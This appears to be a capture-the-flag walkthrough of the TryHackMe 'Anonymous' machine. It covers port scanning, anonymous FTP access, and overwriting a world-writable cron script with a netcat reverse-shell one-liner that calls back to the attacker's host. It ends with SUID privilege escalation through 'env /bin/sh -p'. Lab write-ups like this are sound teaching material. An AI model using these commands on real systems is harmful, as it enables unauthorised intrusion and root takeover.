wp-tryhackme-anonymous

anonymous

➜  ~ nmap 10.10.10.58 -F
...
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
139/tcp open netbios-ssn
445/tcp open microsoft-ds


➜ ~ nmap 10.10.10.58 -sV -p21,22,139,445
...
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

(ctf) ➜ tmp smbclient --list=10.10.10.58 --no-pass
...
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
pics Disk My SMB Share Directory for Pics
IPC$ IPC IPC Service (anonymous server (Samba, Ubuntu))
...

# the FTP server allows anonymous login
# no password is required

(ctf) ➜ tmp ftp 10.10.10.58
Connected to 10.10.10.58.
220 NamelessOne's FTP Server!
Name (10.10.10.58:arch): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> ls scripts
-rwxr-xrwx 1 1000 1000 314 Jun 04 2020 clean.sh
-rw-rw-r-- 1 1000 1000 2236 Feb 13 14:04 removed_files.log
-rw-r--r-- 1 1000 1000 68 May 12 2020 to_do.txt
226 Directory send OK.

ftp> get clean.sh

Then, in another terminal:

(ctf)   tmp cat clean.sh
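#!/bin/bash
# clean.sh - remove a list of temporary files under /tmp and record each
# action in /var/ftp/scripts/removed_files.log.
#
# tmp_files holds a whitespace-separated list of file names relative to /tmp;
# the value 0 means "nothing to delete".
#
# NOTE(review): this script is served from an FTP directory and was listed as
# world-writable (rwxr-xrwx). A script that runs on a schedule must be writable
# only by its owner; otherwise anyone who can write the file runs code as the
# owner the next time it executes.

tmp_files=0
log_file=/var/ftp/scripts/removed_files.log

printf '%s\n' "$tmp_files"

# The original test `[ $tmp_files=0 ]` expands to a single non-empty word and is
# therefore always true, so the deletion branch could never run. Compare the two
# operands as separate words instead.
if [[ "$tmp_files" == 0 ]]; then
  printf '%s\n' "Running cleanup script:  nothing to delete" >> "$log_file"
else
  # Word-splitting on $tmp_files is intentional: it is a list of names.
  for entry in $tmp_files; do
    # Quote the path and use `--` so a name starting with '-' is not parsed as
    # an option; log only when the removal actually succeeded.
    rm -rf -- "/tmp/$entry" && printf '%s | Removed file /tmp/%s\n' "$(date)" "$entry" >> "$log_file"
  done
fi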

# the script is probably run by a cron job
# it is world-writable (rwxr-xrwx in the listing above), so it can be modified
# use the put command to overwrite it; don't delete the file here

ftp> put clean.sh

#!/bin/bash
# Replacement contents for clean.sh, uploaded over the anonymous FTP session
# above. This only works because the original script is world-writable and is
# presumably executed on a schedule as namelessone (the writeup guesses
# crontab; the shell that comes back runs as that user). On the target side the
# fix is to make /var/ftp/scripts/clean.sh writable by its owner only and not to
# serve a scheduled script from a directory that anonymous FTP users can write to;
# a change to that file's contents or mode is the event to watch for.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.2.30.143 5555 >/tmp/f

# in another terminal, start the listener
  ~ rlwrap nc -lvnp 5555
...
namelessone@anonymous:~$ ls
...
pics
user.txt
namelessone@anonymous:~$ cat user.txt
# flag 1 is printed here

# we now have a reverse shell, but sudo needs a TTY, so spawn one:
python -c 'import pty; pty.spawn("/bin/bash")'

# but we don't know namelessone's password
namelessone@anonymous:~$ sudo -l
[sudo] password for namelessone:

# look for SUID binaries instead

namelessone@anonymous:~$ find / -user root -perm /4000 2>/dev/null
...
/usr/bin/env
...

env /bin/sh -p # note the -p flag: it stops the shell from dropping the elevated privileges it was started with
# cat /root/*
flag2